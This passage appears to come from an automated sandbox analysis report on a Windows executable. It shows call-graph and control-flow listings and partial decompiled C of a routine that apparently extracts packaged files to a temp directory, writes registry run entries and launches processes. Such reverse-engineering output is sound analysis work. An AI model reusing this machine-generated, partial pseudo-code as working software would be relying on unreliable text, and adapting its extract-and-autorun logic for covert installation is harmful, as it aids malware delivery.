2784->2786 2787 f844b9 20 API calls 2785->2787 2788 f85ba1 memset 2786->2788 2789 f85a21 MulDiv 2786->2789 2790 f859cc 2787->2790 2791 f86285 GetLastError 2788->2791 2789->2788 2792 f85a50 GetVolumeInformationA 2789->2792 2793 f86285 GetLastError 2790->2793 2794 f85bbc GetLastError FormatMessageA 2791->2794 2795 f85a6e memset 2792->2795 2796 f85ab5 SetCurrentDirectoryA 2792->2796 2798 f859d1 2793->2798 2799 f85be3 2794->2799 2800 f86285 GetLastError 2795->2800 2797 f85acc 2796->2797 2806 f85b0a 2797->2806 2808 f85b20 2797->2808 2809 f85b94 2798->2809 2801 f844b9 20 API calls 2799->2801 2802 f85a89 GetLastError FormatMessageA 2800->2802 2804 f85bf5 SetCurrentDirectoryA 2801->2804 2802->2799 2803 f86ce0 4 API calls 2805 f85c11 2803->2805 2804->2809 2805->2610 2807 f844b9 20 API calls 2806->2807 2807->2798 2808->2809 2834 f8268b 2808->2834 2809->2803 2813 f853bf 2811->2813 2812 f8171e _vsnprintf 2812->2813 2813->2812 2814 f8658a CharPrevA 2813->2814 2818 f85415 GetTempFileNameA 2813->2818 2815 f853fa RemoveDirectoryA GetFileAttributesA 2814->2815 2815->2813 2816 f8544f CreateDirectoryA 2815->2816 2817 f8543a 2816->2817 2816->2818 2820 f86ce0 4 API calls 2817->2820 2818->2817 2819 f85429 DeleteFileA CreateDirectoryA 2818->2819 2819->2817 2821 f85449 2820->2821 2821->2756 2823 f858d8 2822->2823 2823->2823 2824 f858df LocalAlloc 2823->2824 2825 f85919 2824->2825 2826 f858f3 2824->2826 2829 f8658a CharPrevA 2825->2829 2827 f844b9 20 API calls 2826->2827 2833 f85906 2827->2833 2828 f86285 GetLastError 2830 f85534 2828->2830 2831 f85931 CreateFileA LocalFree 2829->2831 2830->2758 2830->2759 2832 f8595b CloseHandle GetFileAttributesA 2831->2832 2831->2833 2832->2833 2833->2828 2833->2830 2835 f826b9 2834->2835 2836 f826e5 2834->2836 2837 f8171e _vsnprintf 2835->2837 2838 f826ea 2836->2838 2839 f8271f 2836->2839 2840 f826cc 2837->2840 2841 f8171e _vsnprintf 2838->2841 2842 f8171e _vsnprintf 2839->2842 2849 f826e3 2839->2849 2844 f844b9 20 API calls 2840->2844 2845 f826fd 2841->2845 2847 f82735 2842->2847 2843 f86ce0 4 API calls 2848 f8276d 2843->2848 2844->2849 2846 f844b9 20 API calls 2845->2846 2846->2849 2850 f844b9 20 API calls 2847->2850 2848->2809 2849->2843 2850->2849 2852 f8468f 7 API calls 2851->2852 2853 f84ff5 FindResourceA LoadResource LockResource 2852->2853 2854 f85020 2853->2854 2870 f8515f 2853->2870 2855 f85029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2854->2855 2856 f85057 2854->2856 2855->2856 2873 f84efd 2856->2873 2859 f85060 2860 f844b9 20 API calls 2859->2860 2867 f85075 2860->2867 2861 f850e8 2863 f844b9 20 API calls 2861->2863 2862 f85106 2864 f8511d 2862->2864 2865 f85110 FreeResource 2862->2865 2863->2867 2868 f8513a 2864->2868 2869 f85129 2864->2869 2865->2864 2866 f8507c 2866->2861 2866->2862 2867->2862 2868->2870 2872 f8514c SendMessageA 2868->2872 2871 f844b9 20 API calls 2869->2871 2870->2653 2871->2868 2872->2870 2874 f84f4a 2873->2874 2875 f84fa1 2874->2875 2881 f84980 2874->2881 2877 f86ce0 4 API calls 2875->2877 2878 f84fc6 2877->2878 2878->2859 2878->2866 2882 f84990 2881->2882 2883 f849c2 lstrcmpA 2882->2883 2884 f849a5 2882->2884 2886 f84a0e 2883->2886 2887 f849ba 2883->2887 2885 f844b9 20 API calls 2884->2885 2885->2887 2886->2887 2892 f8487a 2886->2892 2887->2875 2889 f84b60 2887->2889 2890 f84b92 FindCloseChangeNotification 2889->2890 2891 f84b76 2889->2891 2890->2891 2891->2875 2893 f848a2 CreateFileA 2892->2893 2895 f84908 2893->2895 2896 f848e9 2893->2896 2895->2887 2896->2895 2897 f848ee 2896->2897 2900 f8490c 2897->2900 2901 f84917 2900->2901 2902 f848f5 CreateFileA 2900->2902 2901->2902 2903 f84962 CharNextA 2901->2903 2904 f84953 CreateDirectoryA 2901->2904 2902->2895 2903->2901 2904->2903 2906 f8255b 2905->2906 2907 f82510 2905->2907 2909 f86ce0 4 API calls 2906->2909 2908 f8658a CharPrevA 2907->2908 2910 f82522 WritePrivateProfileStringA _lopen 2908->2910 2911 f82569 2909->2911 2910->2906 2912 f82548 _llseek _lclose 2910->2912 2911->2662 2912->2906 2914 f81b25 2913->2914 3017 f81a84 2914->3017 2916 f81b57 2917 f8658a CharPrevA 2916->2917 2918 f81b8c 2916->2918 2917->2918 2919 f866c8 2 API calls 2918->2919 2920 f81bd1 2919->2920 2921 f81bd9 CompareStringA 2920->2921 2922 f81d73 2920->2922 2921->2922 2923 f81bf7 GetFileAttributesA 2921->2923 2924 f866c8 2 API calls 2922->2924 2928 f81d53 2923->2928 2929 f81c0d 2923->2929 2925 f81d7d 2924->2925 2926 f81df8 LocalAlloc 2925->2926 2927 f81d81 CompareStringA 2925->2927 2926->2928 2931 f81e0b GetFileAttributesA 2926->2931 2927->2926 2936 f81d9b 2927->2936 2932 f844b9 20 API calls 2928->2932 2929->2928 2930 f81a84 2 API calls 2929->2930 2933 f81c31 2930->2933 2944 f81e1d 2931->2944 2951 f81e45 2931->2951 2950 f81cc2 2932->2950 2934 f81c50 LocalAlloc 2933->2934 2939 f81a84 2 API calls 2933->2939 2934->2928 2937 f81c67 GetPrivateProfileIntA GetPrivateProfileStringA 2934->2937 2935 f81e89 2938 f86ce0 4 API calls 2935->2938 2936->2936 2940 f81dbe LocalAlloc 2936->2940 2946 f81cf8 2937->2946 2937->2950 2943 f81ea1 2938->2943 2939->2934 2940->2928 2945 f81de1 2940->2945 2943->2683 2944->2951 2949 f8171e _vsnprintf 2945->2949 2947 f81d09 GetShortPathNameA 2946->2947 2948 f81d23 2946->2948 2947->2948 2952 f8171e _vsnprintf 2948->2952 2949->2950 2950->2935 3023 f82aac 2951->3023 2952->2950 2954 f8209a 2953->2954 2955 f82256 2953->2955 2957 f8171e _vsnprintf 2954->2957 2960 f820dc 2954->2960 2956 f86ce0 4 API calls 2955->2956 2958 f82263 2956->2958 2959 f820af RegQueryValueExA 2957->2959 2958->2683 2959->2954 2959->2960 2961 f820fb GetSystemDirectoryA 2960->2961 2962 f820e4 RegCloseKey 2960->2962 2963 f8658a CharPrevA 2961->2963 2962->2955 2964 f8211b LoadLibraryA 2963->2964 2965 f82179 GetModuleFileNameA 2964->2965 2966 f8212e GetProcAddress FreeLibrary 2964->2966 2968 f821de RegCloseKey 2965->2968 2969 f82177 LocalAlloc 2965->2969 2966->2965 2967 f8214e GetSystemDirectoryA 2966->2967 2967->2969 2970 f82165 2967->2970 2968->2955 2973 f821ec 2969->2973 2974 f821cd 2969->2974 2971 f8658a CharPrevA 2970->2971 2971->2969 2976 f8171e _vsnprintf 2973->2976 2975 f844b9 20 API calls 2974->2975 2975->2968 2977 f82218 RegSetValueExA RegCloseKey LocalFree 2976->2977 2977->2955 2980 f84106 2979->2980 2981 f84016 CreateProcessA 2979->2981 2982 f86ce0 4 API calls 2980->2982 2983 f84041 WaitForSingleObject GetExitCodeProcess 2981->2983 2984 f840c4 2981->2984 2985 f84117 2982->2985 2989 f84070 2983->2989 2986 f86285 GetLastError 2984->2986 2985->2683 2988 f840c9 GetLastError FormatMessageA 2986->2988 2991 f844b9 20 API calls 2988->2991 3050 f8411b 2989->3050 2990 f84096 CloseHandle CloseHandle 2990->2980 2992 f840ba 2990->2992 2991->2980 2992->2980 2994 f864c2 2993->2994 2995 f8658a CharPrevA 2994->2995 2996 f864d8 GetFileAttributesA 2995->2996 2997 f864ea 2996->2997 2998 f86501 LoadLibraryA 2996->2998 2997->2998 2999 f864ee LoadLibraryExA 2997->2999 3000 f86508 2998->3000 2999->3000 3001 f86ce0 4 API calls 3000->3001 3002 f86513 3001->3002 3002->2701 3004 f82289 RegOpenKeyExA 3003->3004 3005 f82381 3003->3005 3004->3005 3007 f822b1 RegQueryValueExA 3004->3007 3006 f86ce0 4 API calls 3005->3006 3008 f8238c 3006->3008 3009 f82374 RegCloseKey 3007->3009 3010 f822e6 memset GetSystemDirectoryA 3007->3010 3008->2675 3009->3005 3011 f8230f 3010->3011 3012 f82321 3010->3012 3013 f8658a CharPrevA 3011->3013 3014 f8171e _vsnprintf 3012->3014 3013->3012 3015 f8233f 3014->3015 3015->3015 3016 f82353 RegSetValueExA 3015->3016 3016->3009 3018 f81a9a 3017->3018 3020 f81aba 3018->3020 3022 f81aaf 3018->3022 3036 f8667f 3018->3036 3020->2916 3021 f8667f 2 API calls 3021->3022 3022->3020 3022->3021 3024 f82be6 3023->3024 3025 f82ad4 GetModuleFileNameA 3023->3025 3026 f86ce0 4 API calls 3024->3026 3035 f82b02 3025->3035 3028 f82bf5 3026->3028 3027 f82af1 IsDBCSLeadByte 3027->3035 3028->2935 3029 f82bca CharNextA 3032 f82bd3 CharNextA 3029->3032 3030 f82b11 CharNextA CharUpperA 3031 f82b8d CharUpperA 3030->3031 3030->3035 3031->3035 3032->3035 3034 f82b43 CharPrevA 3034->3035 3035->3024 3035->3027 3035->3029 3035->3030 3035->3032 3035->3034 3041 f865e8 3035->3041 3037 f86689 3036->3037 3038 f866a5 3037->3038 3039 f86648 IsDBCSLeadByte 3037->3039 3040 f86697 CharNextA 3037->3040 3038->3018 3039->3037 3040->3037 3042 f865f4 3041->3042 3042->3042 3043 f865fb CharPrevA 3042->3043 3044 f86611 CharPrevA 3043->3044 3045 f8661e 3044->3045 3046 f8660b 3044->3046 3047 f8663d 3045->3047 3048 f86634 CharNextA 3045->3048 3049 f86627 CharPrevA 3045->3049 3046->3044 3046->3045 3047->3035 3048->3047 3049->3047 3049->3048 3051 f84132 3050->3051 3053 f8412a 3050->3053 3054 f81ea7 3051->3054 3053->2990 3055 f81ed3 3054->3055 3056 f81eba 3054->3056 3055->3053 3057 f8256d 15 API calls 3056->3057 3057->3055 3059 f81ff0 RegOpenKeyExA 3058->3059 3060 f82026 3058->3060 3059->3060 3061 f8200f RegDeleteValueA RegCloseKey 3059->3061 3060->2320 3061->3060 3062 f84ca0 GlobalAlloc 3173 f819e0 3174 f81a03 3173->3174 3175 f81a24 GetDesktopWindow 3173->3175 3177 f81a20 3174->3177 3178 f81a16 EndDialog 3174->3178 3176 f843d0 11 API calls 3175->3176 3179 f81a33 LoadStringA SetDlgItemTextA MessageBeep 3176->3179 3180 f86ce0 4 API calls 3177->3180 3178->3177 3179->3177 3181 f81a7e 3180->3181 3182 f86a20 __getmainargs 3063 f84cd0 3064 f84d0b 3063->3064 3065 f84cf4 3063->3065 3066 f84d02 3064->3066 3069 f84dcb 3064->3069 3072 f84d25 3064->3072 3065->3066 3067 f84b60 FindCloseChangeNotification 3065->3067 3068 f86ce0 4 API calls 3066->3068 3067->3066 3070 f84e95 3068->3070 3071 f84dd4 SetDlgItemTextA 3069->3071 3073 f84de3 3069->3073 3071->3073 3072->3066 3086 f84c37 3072->3086 3073->3066 3091 f8476d 3073->3091 3077 f84e38 3077->3066 3079 f84980 25 API calls 3077->3079 3078 f84b60 FindCloseChangeNotification 3080 f84d99 SetFileAttributesA 3078->3080 3081 f84e56 3079->3081 3080->3066 3081->3066 3082 f84e64 3081->3082 3100 f847e0 LocalAlloc 3082->3100 3085 f84e6f 3085->3066 3087 f84c4c DosDateTimeToFileTime 3086->3087 3088 f84c88 3086->3088 3087->3088 3089 f84c5e LocalFileTimeToFileTime 3087->3089 3088->3066 3088->3078 3089->3088 3090 f84c70 SetFileTime 3089->3090 3090->3088 3109 f866ae GetFileAttributesA 3091->3109 3093 f8477b 3093->3077 3094 f847cc SetFileAttributesA 3096 f847db 3094->3096 3096->3077 3097 f86517 24 API calls 3098 f847b1 3097->3098 3098->3094 3098->3096 3099 f847c2 3098->3099 3099->3094 3101 f8480f LocalAlloc 3100->3101 3102 f847f6 3100->3102 3105 f84831 3101->3105 3108 f8480b 3101->3108 3103 f844b9 20 API calls 3102->3103 3103->3108 3106 f844b9 20 API calls 3105->3106 3107 f84846 LocalFree 3106->3107 3107->3108 3108->3085 3110 f84777 3109->3110 3110->3093 3110->3094 3110->3097 3111 f84ad0 3119 f83680 3111->3119 3114 f84ae9 3115 f84aee WriteFile 3116 f84b0f 3115->3116 3117 f84b14 3115->3117 3117->3116 3118 f84b3b SendDlgItemMessageA 3117->3118 3118->3116 3120 f83691 MsgWaitForMultipleObjects 3119->3120 3121 f836e8 3120->3121 3122 f836a9 PeekMessageA 3120->3122 3121->3114 3121->3115 3122->3120 3123 f836bc 3122->3123 3123->3120 3123->3121 3124 f836c7 DispatchMessageA 3123->3124 3125 f836d1 PeekMessageA 3123->3125 3124->3125 3125->3123 3183 f84a50 3184 f84a9f ReadFile 3183->3184 3185 f84a66 3183->3185 3186 f84abb 3184->3186 3185->3186 3187 f84a82 memcpy 3185->3187 3187->3186 3188 f83450 3189 f8345e 3188->3189 3190 f834d3 EndDialog 3188->3190 3191 f8349a GetDesktopWindow 3189->3191 3196 f83465 3189->3196 3192 f8346a 3190->3192 3193 f843d0 11 API calls 3191->3193 3194 f834ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3193->3194 3194->3192 3195 f8348c EndDialog 3195->3192 3196->3192 3196->3195 3197 f83210 3198 f83227 3197->3198 3223 f8328e EndDialog 3197->3223 3199 f833e2 GetDesktopWindow 3198->3199 3202 f83235 3198->3202 3201 f843d0 11 API calls 3199->3201 3203 f833f1 SetWindowTextA SendDlgItemMessageA 3201->3203 3204 f8324c 3202->3204 3205 f832dd GetDlgItemTextA 3202->3205 3215 f83239 3202->3215 3206 f8341f GetDlgItem EnableWindow 3203->3206 3203->3215 3208 f83251 3204->3208 3209 f832c5 EndDialog 3204->3209 3207 f83366 3205->3207 3216 f832fc 3205->3216 3206->3215 3211 f844b9 20 API calls 3207->3211 3210 f8325c LoadStringA 3208->3210 3208->3215 3209->3215 3212 f8327b 3210->3212 3213 f83294 3210->3213 3211->3215 3219 f844b9 20 API calls 3212->3219 3235 f84224 LoadLibraryA 3213->3235 3216->3207 3218 f83331 GetFileAttributesA 3216->3218 3221 f8337c 3218->3221 3222 f8333f 3218->3222 3219->3223 3220 f832a5 SetDlgItemTextA 3220->3212 3220->3215 3224 f8658a CharPrevA 3221->3224 3225 f844b9 20 API calls 3222->3225 3223->3215 3227 f8338d 3224->3227 3226 f83351 3225->3226 3226->3215 3228 f8335a CreateDirectoryA 3226->3228 3229 f858c8 27 API calls 3227->3229 3228->3207 3228->3221 3230 f83394 3229->3230 3230->3207 3231 f833a4 3230->3231 3232 f833c7 EndDialog 3231->3232 3233 f8597d 34 API calls 3231->3233 3232->3215 3234 f833c3 3233->3234 3234->3215 3234->3232 3236 f843b2 3235->3236 3237 f84246 GetProcAddress 3235->3237 3241 f844b9 20 API calls 3236->3241 3238 f8425d GetProcAddress 3237->3238 3239 f843a4 FreeLibrary 3237->3239 3238->3239 3240 f84274 GetProcAddress 3238->3240 3239->3236 3240->3239 3242 f8428b 3240->3242 3244 f8329d 3241->3244 3243 f84295 GetTempPathA 3242->3243 3249 f842e1 3242->3249 3245 f842ad 3243->3245 3244->3215 3244->3220 3245->3245 3246 f842b4 CharPrevA 3245->3246 3247 f842d0 CharPrevA 3246->3247 3246->3249 3247->3249 3248 f84390 FreeLibrary 3248->3244 3249->3248 3126 f84cc0 GlobalFree 3127 f86f40 SetUnhandledExceptionFilter 3250 f84bc0 3252 f84bd7 3250->3252 3253 f84c05 3250->3253 3251 f84c1b SetFilePointer 3251->3252 3253->3251 3253->3252 3254 f830c0 3255 f830de CallWindowProcA 3254->3255 3256 f830ce 3254->3256 3257 f830da 3255->3257 3256->3255 3256->3257 3258 f863c0 3259 f86407 3258->3259 3260 f8658a CharPrevA 3259->3260 3261 f86415 CreateFileA 3260->3261 3262 f86448 WriteFile 3261->3262 3263 f8643a 3261->3263 3264 f86465 CloseHandle 3262->3264 3266 f86ce0 4 API calls 3263->3266 3264->3263 3267 f8648f 3266->3267 3268 f83100 3269 f831b0 3268->3269 3270 f83111 3268->3270 3272 f831b9 SendDlgItemMessageA 3269->3272 3275 f83141 3269->3275 3271 f8311d 3270->3271 3273 f83149 GetDesktopWindow 3270->3273 3274 f83138 EndDialog 3271->3274 3271->3275 3272->3275 3276 f843d0 11 API calls 3273->3276 3274->3275 3277 f8315d 6 API calls 3276->3277 3277->3275 3278 f84200 3279 f8420b SendMessageA 3278->3279 3280 f8421e 3278->3280 3279->3280 3281 f86c03 3282 f86c1e 3281->3282 3283 f86c17 _exit 3281->3283 3284 f86c27 _cexit 3282->3284 3285 f86c32 3282->3285 3283->3282 3284->3285

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_00F866F9 1 Function_00F82BFB 39 Function_00F852B6 1->39 40 Function_00F82CAA 1->40 56 Function_00F81F90 1->56 105 Function_00F82F1D 1->105 2 Function_00F84EFD 19 Function_00F86CE0 2->19 64 Function_00F84980 2->64 80 Function_00F84B60 2->80 3 Function_00F870FE 4 Function_00F86EF0 5 Function_00F834F0 24 Function_00F843D0 5->24 35 Function_00F844B9 5->35 65 Function_00F83680 5->65 6 Function_00F86CF0 7 Function_00F81AE8 7->19 28 Function_00F866C8 7->28 7->35 38 Function_00F816B3 7->38 41 Function_00F82AAC 7->41 60 Function_00F8658A 7->60 63 Function_00F81680 7->63 67 Function_00F81781 7->67 68 Function_00F81A84 7->68 107 Function_00F8171E 7->107 8 Function_00F828E8 59 Function_00F82A89 8->59 75 Function_00F82773 8->75 9 Function_00F865E8 10 Function_00F870EB 11 Function_00F836EE 11->8 11->19 30 Function_00F867C9 11->30 11->35 11->59 108 Function_00F8681F 11->108 12 Function_00F817EE 12->19 13 Function_00F83FEF 13->19 13->35 69 Function_00F86285 13->69 104 Function_00F8411B 13->104 14 Function_00F871EF 15 Function_00F86BEF 16 Function_00F84FE0 16->2 16->35 62 Function_00F8468F 16->62 17 Function_00F847E0 17->35 17->63 18 Function_00F831E0 19->6 20 Function_00F824E0 20->19 20->60 21 Function_00F819E0 21->19 21->24 22 Function_00F81FE1 23 Function_00F851E5 23->35 23->62 23->69 24->19 25 Function_00F84CD0 25->17 25->19 53 Function_00F84E99 25->53 25->64 78 Function_00F8476D 25->78 25->80 97 Function_00F84C37 25->97 118 Function_00F84702 25->118 26 Function_00F84AD0 26->65 27 Function_00F858C8 27->35 27->60 27->63 27->69 91 Function_00F86648 28->91 29 Function_00F817C8 57 Function_00F86793 30->57 31 Function_00F84CC0 32 Function_00F84BC0 33 Function_00F830C0 34 Function_00F863C0 34->19 34->60 34->67 35->19 35->30 35->63 35->107 35->108 36 Function_00F86FBE 89 Function_00F86F54 36->89 37 Function_00F869B0 37->14 37->36 74 Function_00F86C70 37->74 117 Function_00F87000 37->117 38->67 39->9 39->19 39->22 55 Function_00F82390 39->55 39->67 40->11 40->19 40->35 49 Function_00F818A3 40->49 54 Function_00F85C9E 40->54 40->55 40->62 112 Function_00F86517 40->112 41->9 41->19 41->29 41->63 42 Function_00F866AE 43 Function_00F855A0 43->19 43->35 43->60 43->62 43->67 43->69 71 Function_00F8597D 43->71 84 Function_00F85467 43->84 88 Function_00F86952 43->88 96 Function_00F82630 43->96 43->112 44 Function_00F84CA0 45 Function_00F853A1 45->19 45->60 45->63 45->107 46 Function_00F86FA1 47 Function_00F83BA2 47->7 47->13 47->19 47->35 58 Function_00F86495 47->58 47->62 47->67 47->69 85 Function_00F82267 47->85 98 Function_00F8202A 47->98 48 Function_00F872A2 49->12 49->19 50 Function_00F86FA5 92 Function_00F8724D 50->92 51 Function_00F81EA7 77 Function_00F8256D 51->77 52 Function_00F86298 52->19 52->107 53->63 54->18 54->19 54->28 54->35 54->60 54->63 72 Function_00F8667F 54->72 99 Function_00F86E2A 54->99 111 Function_00F85C17 54->111 55->19 55->38 55->55 55->60 55->63 56->19 56->35 56->51 58->19 58->60 58->67 60->38 61 Function_00F8268B 61->19 61->35 61->107 63->67 64->35 70 Function_00F8487A 64->70 66 Function_00F86380 68->72 114 Function_00F8490C 70->114 71->19 71->35 71->61 71->69 72->91 73 Function_00F87270 75->19 75->60 75->63 75->67 76 Function_00F84169 76->35 76->62 77->20 78->42 78->112 79 Function_00F87060 100 Function_00F87120 79->100 109 Function_00F87010 79->109 81 Function_00F86760 82 Function_00F86A60 82->1 82->79 90 Function_00F87155 82->90 82->92 95 Function_00F86C3F 82->95 113 Function_00F87208 82->113 83 Function_00F85164 83->35 83->52 83->62 84->19 84->27 84->45 84->60 84->63 84->67 84->69 84->71 85->19 85->60 85->107 86 Function_00F84A50 87 Function_00F83450 87->24 89->92 89->113 93 Function_00F86F40 94 Function_00F83A3F 94->35 94->62 94->69 94->112 96->19 96->35 98->19 98->35 98->60 98->107 99->6 101 Function_00F86A20 102 Function_00F84224 102->35 102->63 103 Function_00F83B26 103->16 103->52 103->112 104->51 105->19 105->23 105->35 105->43 105->47 105->60 105->69 105->76 105->77 105->83 105->94 105->103 106 Function_00F8621E 105->106 106->19 106->35 106->69 106->71 108->0 108->19 110 Function_00F83210 110->24 110->27 110->35 110->60 110->71 110->102 112->35 115 Function_00F83100 115->24 116 Function_00F84200 118->38 118->63 119 Function_00F86C03 119->92

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 36 f83ba2-f83bd9 37 f83bdb-f83bee call f8468f 36->37 38 f83bfd-f83bff 36->38 44 f83d13-f83d30 call f844b9 37->44 45 f83bf4-f83bf7 37->45 40 f83c03-f83c28 memset 38->40 42 f83c2e-f83c40 call f8468f 40->42 43 f83d35-f83d48 call f81781 40->43 42->44 51 f83c46-f83c49 42->51 49 f83d4d-f83d52 43->49 57 f83f4d 44->57 45->38 45->44 53 f83d9e-f83db6 call f81ae8 49->53 54 f83d54-f83d6c call f8468f 49->54 51->44 55 f83c4f-f83c56 51->55 53->57 68 f83dbc-f83dc2 53->68 54->44 64 f83d6e-f83d75 54->64 59 f83c58-f83c5e 55->59 60 f83c60-f83c65 55->60 62 f83f4f-f83f63 call f86ce0 57->62 65 f83c6e-f83c73 59->65 66 f83c75-f83c7c 60->66 67 f83c67-f83c6d 60->67 70 f83fda-f83fe1 64->70 71 f83d7b-f83d98 CompareStringA 64->71 72 f83c87-f83c89 65->72 66->72 75 f83c7e-f83c82 66->75 67->65 73 f83dc4-f83dce 68->73 74 f83de6-f83de8 68->74 81 f83fe8-f83fea 70->81 82 f83fe3 call f82267 70->82 71->53 71->70 72->49 78 f83c8f-f83c98 72->78 73->74 77 f83dd0-f83dd7 73->77 79 f83f0b-f83f15 call f83fef 74->79 80 f83dee-f83df5 74->80 75->72 77->74 84 f83dd9-f83ddb 77->84 85 f83c9a-f83c9c 78->85 86 f83cf1-f83cf3 78->86 91 f83f1a-f83f1c 79->91 87 f83fab-f83fd2 call f844b9 LocalFree 80->87 88 f83dfb-f83dfd 80->88 81->62 82->81 84->80 92 f83ddd-f83de1 call f8202a 84->92 94 f83c9e-f83ca3 85->94 95 f83ca5-f83ca7 85->95 86->53 90 f83cf9-f83d11 call f8468f 86->90 87->57 88->79 96 f83e03-f83e0a 88->96 90->44 90->49 98 f83f1e-f83f2d LocalFree 91->98 99 f83f46-f83f47 LocalFree 91->99 92->74 102 f83cb2-f83cc5 call f8468f 94->102 95->57 103 f83cad 95->103 96->79 104 f83e10-f83e19 call f86495 96->104 107 f83f33-f83f3b 98->107 108 f83fd7-f83fd9 98->108 99->57 102->44 112 f83cc7-f83ce8 CompareStringA 102->112 103->102 113 f83e1f-f83e36 GetProcAddress 104->113 114 f83f92-f83fa9 call f844b9 104->114 107->40 108->70 112->86 115 f83cea-f83ced 112->115 116 f83e3c-f83e80 113->116 117 f83f64-f83f76 call f844b9 FreeLibrary 113->117 126 f83f7c-f83f90 LocalFree call f86285 114->126 115->86 120 f83e8b-f83e94 116->120 121 f83e82-f83e87 116->121 117->126 124 f83e9f-f83ea2 120->124 125 f83e96-f83e9b 120->125 121->120 128 f83ead-f83eb6 124->128 129 f83ea4-f83ea9 124->129 125->124 126->57 131 f83eb8-f83ebd 128->131 132 f83ec1-f83ec3 128->132 129->128 131->132 133 f83ece-f83eec 132->133 134 f83ec5-f83eca 132->134 137 f83eee-f83ef3 133->137 138 f83ef5-f83efd 133->138 134->133 137->138 139 f83eff-f83f09 FreeLibrary 138->139 140 f83f40 FreeLibrary 138->140 139->98 140->99
                                                                        C-Code - Quality: 82%
                                                                        			E00F83BA2() {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				char _v276;
                                                                        				char _v280;
                                                                        				short _v300;
                                                                        				intOrPtr _v304;
                                                                        				void _v348;
                                                                        				char _v352;
                                                                        				intOrPtr _v356;
                                                                        				signed int _v360;
                                                                        				short _v364;
                                                                        				char* _v368;
                                                                        				intOrPtr _v372;
                                                                        				void* _v376;
                                                                        				intOrPtr _v380;
                                                                        				char _v384;
                                                                        				signed int _v388;
                                                                        				intOrPtr _v392;
                                                                        				signed int _v396;
                                                                        				signed int _v400;
                                                                        				signed int _v404;
                                                                        				void* _v408;
                                                                        				void* _v424;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t69;
                                                                        				signed int _t76;
                                                                        				void* _t77;
                                                                        				signed int _t79;
                                                                        				short _t96;
                                                                        				signed int _t97;
                                                                        				intOrPtr _t98;
                                                                        				signed int _t101;
                                                                        				signed int _t104;
                                                                        				signed int _t108;
                                                                        				int _t112;
                                                                        				void* _t115;
                                                                        				signed char _t118;
                                                                        				void* _t125;
                                                                        				signed int _t127;
                                                                        				void* _t128;
                                                                        				struct HINSTANCE__* _t129;
                                                                        				void* _t130;
                                                                        				short _t137;
                                                                        				char* _t140;
                                                                        				signed char _t144;
                                                                        				signed char _t145;
                                                                        				signed int _t149;
                                                                        				void* _t150;
                                                                        				void* _t151;
                                                                        				signed int _t153;
                                                                        				void* _t155;
                                                                        				void* _t156;
                                                                        				signed int _t157;
                                                                        				signed int _t162;
                                                                        				signed int _t164;
                                                                        				void* _t165;
                                                                        
                                                                        				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                        				_t69 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t69 ^ _t164;
                                                                        				_t153 = 0;
                                                                        				 *0xf89124 =  *0xf89124 & 0;
                                                                        				_t149 = 0;
                                                                        				_v388 = 0;
                                                                        				_v384 = 0;
                                                                        				_t165 =  *0xf88a28 - _t153; // 0x0
                                                                        				if(_t165 != 0) {
                                                                        					L3:
                                                                        					_t127 = 0;
                                                                        					_v392 = 0;
                                                                        					while(1) {
                                                                        						_v400 = _v400 & 0x00000000;
                                                                        						memset( &_v348, 0, 0x44);
                                                                        						_t164 = _t164 + 0xc;
                                                                        						_v348 = 0x44;
                                                                        						if( *0xf88c42 != 0) {
                                                                        							goto L26;
                                                                        						}
                                                                        						_t146 =  &_v396;
                                                                        						_t115 = E00F8468F("SHOWWINDOW",  &_v396, 4);
                                                                        						if(_t115 == 0 || _t115 > 4) {
                                                                        							L25:
                                                                        							_t146 = 0x4b1;
                                                                        							E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        							 *0xf89124 = 0x80070714;
                                                                        							goto L62;
                                                                        						} else {
                                                                        							if(_v396 != 1) {
                                                                        								__eflags = _v396 - 2;
                                                                        								if(_v396 != 2) {
                                                                        									_t137 = 3;
                                                                        									__eflags = _v396 - _t137;
                                                                        									if(_v396 == _t137) {
                                                                        										_v304 = 1;
                                                                        										_v300 = _t137;
                                                                        									}
                                                                        									goto L14;
                                                                        								}
                                                                        								_push(6);
                                                                        								_v304 = 1;
                                                                        								_pop(0);
                                                                        								goto L11;
                                                                        							} else {
                                                                        								_v304 = 1;
                                                                        								L11:
                                                                        								_v300 = 0;
                                                                        								L14:
                                                                        								if(_t127 != 0) {
                                                                        									L27:
                                                                        									_t155 = 1;
                                                                        									__eflags = _t127 - 1;
                                                                        									if(_t127 != 1) {
                                                                        										L31:
                                                                        										_t132 =  &_v280;
                                                                        										_t76 = E00F81AE8( &_v280,  &_v408,  &_v404); // executed
                                                                        										__eflags = _t76;
                                                                        										if(_t76 == 0) {
                                                                        											L62:
                                                                        											_t77 = 0;
                                                                        											L63:
                                                                        											_pop(_t150);
                                                                        											_pop(_t156);
                                                                        											_pop(_t128);
                                                                        											return E00F86CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                        										}
                                                                        										_t157 = _v404;
                                                                        										__eflags = _t149;
                                                                        										if(_t149 != 0) {
                                                                        											L37:
                                                                        											__eflags = _t157;
                                                                        											if(_t157 == 0) {
                                                                        												L57:
                                                                        												_t151 = _v408;
                                                                        												_t146 =  &_v352;
                                                                        												_t130 = _t151; // executed
                                                                        												_t79 = E00F83FEF(_t130,  &_v352); // executed
                                                                        												__eflags = _t79;
                                                                        												if(_t79 == 0) {
                                                                        													L61:
                                                                        													LocalFree(_t151);
                                                                        													goto L62;
                                                                        												}
                                                                        												L58:
                                                                        												LocalFree(_t151);
                                                                        												_t127 = _t127 + 1;
                                                                        												_v396 = _t127;
                                                                        												__eflags = _t127 - 2;
                                                                        												if(_t127 >= 2) {
                                                                        													_t155 = 1;
                                                                        													__eflags = 1;
                                                                        													L69:
                                                                        													__eflags =  *0xf88580;
                                                                        													if( *0xf88580 != 0) {
                                                                        														E00F82267();
                                                                        													}
                                                                        													_t77 = _t155;
                                                                        													goto L63;
                                                                        												}
                                                                        												_t153 = _v392;
                                                                        												_t149 = _v388;
